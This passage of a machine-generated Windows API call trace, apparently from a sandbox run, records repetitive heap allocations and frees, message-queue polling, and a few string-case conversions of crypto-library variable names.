0x2e54d98 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0199.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0199.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.652] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0199.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0199.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0199.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0199.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0199.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0199.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0199.653] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0199.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0199.653] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0199.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0199.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0199.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0199.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0199.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0199.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.654] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0199.654] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0199.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0199.654] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0199.654] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0199.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0199.654] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0199.655] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0199.655] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0199.655] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0199.655] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0199.655] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.655] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.656] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0199.656] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0199.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0199.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0199.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0199.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0199.657] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0199.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0199.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0199.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0199.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0199.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4b640) returned 0x3c76cd8 [0199.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0199.761] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3c76cd8 | out: hHeap=0x970000) returned 1 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0199.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0199.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0199.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0199.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0199.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 